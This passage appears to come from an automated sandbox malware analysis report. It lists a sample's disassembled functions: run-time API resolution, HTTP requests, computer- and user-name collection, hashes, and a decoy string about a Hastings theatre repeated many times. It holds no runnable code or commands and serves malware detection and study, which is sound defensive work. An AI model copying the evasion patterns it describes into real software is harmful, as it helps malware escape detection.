                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE477B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 18f2ffe0d6ab4527d075704407c11f9f5ef7200de0e65a4756a5818ae92195b3
                          • Instruction ID: d5f610213d32cc3f95b064a3134486134b1dd292206f66200881c69859c099cd
                          • Opcode Fuzzy Hash: 18f2ffe0d6ab4527d075704407c11f9f5ef7200de0e65a4756a5818ae92195b3
                          • Instruction Fuzzy Hash: 034137717D26146BC734BBF4884EE9F7BAADF46712F6190C8AA005A6D0CBB06501CDAD
                          Function 00AE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • InternetOpenA.WININET(00B00DFE,00000001,00000000,00000000,00000000), ref: 00AE62E1
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AE63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AE63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AE646D
                          • InternetCloseHandle.WININET(00000000), ref: 00AE64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00AE64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00AE6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: d55dc1361e43de8a3ff37facdeb36dd10066c83433743cbdee387d354636c322
                          • Instruction ID: c6895206903f45f6beeff695594a562f9ece5e60fa2497b7e36a37437f718725
                          • Opcode Fuzzy Hash: d55dc1361e43de8a3ff37facdeb36dd10066c83433743cbdee387d354636c322
                          • Instruction Fuzzy Hash: C9715E71A00258ABDB24EFD4CD49BEE7774FB54700F108598F609AB2D0DBB46A85CFA1
                          Function 00AF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1275 af78e0-af7937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 af7939-af793e 1275->1276 1277 af7942-af7945 1275->1277 1278 af7962-af7972 1276->1278 1277->1278
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00AF792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 28ebfe7f3632900716b9ac8fe3dc87350c91d4392fb82685437061c6682aa22f
                          • Instruction ID: bd0ceabb033e94c4bc5b9b4eb182c99b9763f1e2e3b9931f1fd443682186d0b2
                          • Opcode Fuzzy Hash: 28ebfe7f3632900716b9ac8fe3dc87350c91d4392fb82685437061c6682aa22f
                          • Instruction Fuzzy Hash: 91016DB1A04209EBC750DF98DD45FAEFBB8FB04B21F10425AFA55E2380C77459008BA1
                          Function 00AF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AE11B7), ref: 00AF7880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: c80823923fe218e8ef4e0c478c23a5f707b87f59a6c6b7d0bb7c8f85df8a710e
                          • Instruction ID: 3cdca2dd3f43b3ff33d136dec0bdbc2f3317dcaa664119bdf6fdb622eb2ed004
                          • Opcode Fuzzy Hash: c80823923fe218e8ef4e0c478c23a5f707b87f59a6c6b7d0bb7c8f85df8a710e
                          • Instruction Fuzzy Hash: A3F03CB1944208ABC714DF98DD49BAEFBB8EB04711F10065AFA05E2780C77419058BA1
                          Function 00AE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 1051fddb45c5f1ae8edadac6f634c123f5905f56a6a185d0a0bb673242fd1ea8
                          • Instruction ID: 852669459870f67e08496bff402af58188c5e9190668e8a5580e4b3442d1cf1f
                          • Opcode Fuzzy Hash: 1051fddb45c5f1ae8edadac6f634c123f5905f56a6a185d0a0bb673242fd1ea8
                          • Instruction Fuzzy Hash: 35D05E7490030CDBCB10DFE5DC496EDBB78FB18311F000658D905A3340EA305482CABA
                          Function 00AF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 af9c10-af9c1a 634 afa036-afa0ca LoadLibraryA * 8 633->634 635 af9c20-afa031 GetProcAddress * 43 633->635 636 afa0cc-afa141 GetProcAddress * 5 634->636 637 afa146-afa14d 634->637 635->634 636->637 638 afa216-afa21d 637->638 639 afa153-afa211 GetProcAddress * 8 637->639 640 afa21f-afa293 GetProcAddress * 5 638->640 641 afa298-afa29f 638->641 639->638 640->641 642 afa337-afa33e 641->642 643 afa2a5-afa332 GetProcAddress * 6 641->643 644 afa41f-afa426 642->644 645 afa344-afa41a GetProcAddress * 9 642->645 643->642 646 afa428-afa49d GetProcAddress * 5 644->646 647 afa4a2-afa4a9 644->647 645->644 646->647 648 afa4dc-afa4e3 647->648 649 afa4ab-afa4d7 GetProcAddress * 2 647->649 650 afa515-afa51c 648->650 651 afa4e5-afa510 GetProcAddress * 2 648->651 649->648 652 afa612-afa619 650->652 653 afa522-afa60d GetProcAddress * 10 650->653 651->650 654 afa67d-afa684 652->654 655 afa61b-afa678 GetProcAddress * 4 652->655 653->652 656 afa69e-afa6a5 654->656 657 afa686-afa699 GetProcAddress 654->657 655->654 658 afa708-afa709 656->658 659 afa6a7-afa703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75550000,01785508), ref: 00AF9C2D
                          • GetProcAddress.KERNEL32(75550000,01785268), ref: 00AF9C45
                          • GetProcAddress.KERNEL32(75550000,01798ED0), ref: 00AF9C5E
                          • GetProcAddress.KERNEL32(75550000,01798EE8), ref: 00AF9C76
                          • GetProcAddress.KERNEL32(75550000,0179CF50), ref: 00AF9C8E
                          • GetProcAddress.KERNEL32(75550000,0179CF68), ref: 00AF9CA7
                          • GetProcAddress.KERNEL32(75550000,0178B2B0), ref: 00AF9CBF
                          • GetProcAddress.KERNEL32(75550000,0179CE30), ref: 00AF9CD7
                          • GetProcAddress.KERNEL32(75550000,0179CE00), ref: 00AF9CF0
                          • GetProcAddress.KERNEL32(75550000,0179CEF0), ref: 00AF9D08
                          • GetProcAddress.KERNEL32(75550000,0179CF08), ref: 00AF9D20
                          • GetProcAddress.KERNEL32(75550000,017852C8), ref: 00AF9D39
                          • GetProcAddress.KERNEL32(75550000,01785228), ref: 00AF9D51
                          • GetProcAddress.KERNEL32(75550000,01785388), ref: 00AF9D69
                          • GetProcAddress.KERNEL32(75550000,01785528), ref: 00AF9D82
                          • GetProcAddress.KERNEL32(75550000,0179CE78), ref: 00AF9D9A
                          • GetProcAddress.KERNEL32(75550000,0179CE48), ref: 00AF9DB2
                          • GetProcAddress.KERNEL32(75550000,0178B2D8), ref: 00AF9DCB
                          • GetProcAddress.KERNEL32(75550000,017853C8), ref: 00AF9DE3
                          • GetProcAddress.KERNEL32(75550000,0179CF20), ref: 00AF9DFB
                          • GetProcAddress.KERNEL32(75550000,0179CDB8), ref: 00AF9E14
                          • GetProcAddress.KERNEL32(75550000,0179CF38), ref: 00AF9E2C
                          • GetProcAddress.KERNEL32(75550000,0179CDD0), ref: 00AF9E44
                          • GetProcAddress.KERNEL32(75550000,017853E8), ref: 00AF9E5D
                          • GetProcAddress.KERNEL32(75550000,0179CDE8), ref: 00AF9E75
                          • GetProcAddress.KERNEL32(75550000,0179CEA8), ref: 00AF9E8D
                          • GetProcAddress.KERNEL32(75550000,0179CE60), ref: 00AF9EA6
                          • GetProcAddress.KERNEL32(75550000,0179CE18), ref: 00AF9EBE
                          • GetProcAddress.KERNEL32(75550000,0179CE90), ref: 00AF9ED6
                          • GetProcAddress.KERNEL32(75550000,0179CEC0), ref: 00AF9EEF
                          • GetProcAddress.KERNEL32(75550000,0179CED8), ref: 00AF9F07
                          • GetProcAddress.KERNEL32(75550000,0179C980), ref: 00AF9F1F
                          • GetProcAddress.KERNEL32(75550000,0179C998), ref: 00AF9F38
                          • GetProcAddress.KERNEL32(75550000,01799D90), ref: 00AF9F50
                          • GetProcAddress.KERNEL32(75550000,0179CA58), ref: 00AF9F68
                          • GetProcAddress.KERNEL32(75550000,0179C848), ref: 00AF9F81
                          • GetProcAddress.KERNEL32(75550000,01785408), ref: 00AF9F99
                          • GetProcAddress.KERNEL32(75550000,0179CAA0), ref: 00AF9FB1
                          • GetProcAddress.KERNEL32(75550000,01785428), ref: 00AF9FCA
                          • GetProcAddress.KERNEL32(75550000,0179C7D0), ref: 00AF9FE2
                          • GetProcAddress.KERNEL32(75550000,0179C8C0), ref: 00AF9FFA
                          • GetProcAddress.KERNEL32(75550000,01785568), ref: 00AFA013
                          • GetProcAddress.KERNEL32(75550000,01785588), ref: 00AFA02B
                          • LoadLibraryA.KERNEL32(0179C938,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA03D
                          • LoadLibraryA.KERNEL32(0179CA10,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA04E
                          • LoadLibraryA.KERNEL32(0179C9B0,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA060
                          • LoadLibraryA.KERNEL32(0179C9C8,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA072
                          • LoadLibraryA.KERNEL32(0179CA88,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA083
                          • LoadLibraryA.KERNEL32(0179CA70,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA095
                          • LoadLibraryA.KERNEL32(0179C9E0,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA0A7
                          • LoadLibraryA.KERNEL32(0179C950,?,00AF5CA3,00B00AEB,?,?,?,?,?,?,?,?,?,?,00B00AEA,00B00AE3), ref: 00AFA0B8
                          • GetProcAddress.KERNEL32(75750000,01785828), ref: 00AFA0DA
                          • GetProcAddress.KERNEL32(75750000,0179C7E8), ref: 00AFA0F2
                          • GetProcAddress.KERNEL32(75750000,01798A78), ref: 00AFA10A
                          • GetProcAddress.KERNEL32(75750000,0179C860), ref: 00AFA123
                          • GetProcAddress.KERNEL32(75750000,017856A8), ref: 00AFA13B
                          • GetProcAddress.KERNEL32(73B30000,0178B148), ref: 00AFA160
                          • GetProcAddress.KERNEL32(73B30000,01785708), ref: 00AFA179
                          • GetProcAddress.KERNEL32(73B30000,0178ADD8), ref: 00AFA191
                          • GetProcAddress.KERNEL32(73B30000,0179C9F8), ref: 00AFA1A9
                          • GetProcAddress.KERNEL32(73B30000,0179CA28), ref: 00AFA1C2
                          • GetProcAddress.KERNEL32(73B30000,01785768), ref: 00AFA1DA
                          • GetProcAddress.KERNEL32(73B30000,01785728), ref: 00AFA1F2
                          • GetProcAddress.KERNEL32(73B30000,0179C8F0), ref: 00AFA20B
                          • GetProcAddress.KERNEL32(757E0000,01785788), ref: 00AFA22C
                          • GetProcAddress.KERNEL32(757E0000,01785908), ref: 00AFA244
                          • GetProcAddress.KERNEL32(757E0000,0179C7B8), ref: 00AFA25D
                          • GetProcAddress.KERNEL32(757E0000,0179C830), ref: 00AFA275
                          • GetProcAddress.KERNEL32(757E0000,01785748), ref: 00AFA28D
                          • GetProcAddress.KERNEL32(758D0000,0178AE50), ref: 00AFA2B3
                          • GetProcAddress.KERNEL32(758D0000,0178B1E8), ref: 00AFA2CB
                          • GetProcAddress.KERNEL32(758D0000,0179C890), ref: 00AFA2E3
                          • GetProcAddress.KERNEL32(758D0000,017858A8), ref: 00AFA2FC
                          • GetProcAddress.KERNEL32(758D0000,017856C8), ref: 00AFA314
                          • GetProcAddress.KERNEL32(758D0000,0178AEC8), ref: 00AFA32C
                          • GetProcAddress.KERNEL32(76BE0000,0179CA40), ref: 00AFA352
                          • GetProcAddress.KERNEL32(76BE0000,01785948), ref: 00AFA36A
                          • GetProcAddress.KERNEL32(76BE0000,01798A58), ref: 00AFA382
                          • GetProcAddress.KERNEL32(76BE0000,0179C800), ref: 00AFA39B
                          • GetProcAddress.KERNEL32(76BE0000,0179C8D8), ref: 00AFA3B3
                          • GetProcAddress.KERNEL32(76BE0000,01785608), ref: 00AFA3CB
                          • GetProcAddress.KERNEL32(76BE0000,01785668), ref: 00AFA3E4
                          • GetProcAddress.KERNEL32(76BE0000,0179C818), ref: 00AFA3FC
                          • GetProcAddress.KERNEL32(76BE0000,0179C8A8), ref: 00AFA414
                          • GetProcAddress.KERNEL32(75670000,01785928), ref: 00AFA436
                          • GetProcAddress.KERNEL32(75670000,0179C908), ref: 00AFA44E
                          • GetProcAddress.KERNEL32(75670000,0179C878), ref: 00AFA466
                          • GetProcAddress.KERNEL32(75670000,0179C920), ref: 00AFA47F
                          • GetProcAddress.KERNEL32(75670000,0179C968), ref: 00AFA497
                          • GetProcAddress.KERNEL32(759D0000,017858C8), ref: 00AFA4B8
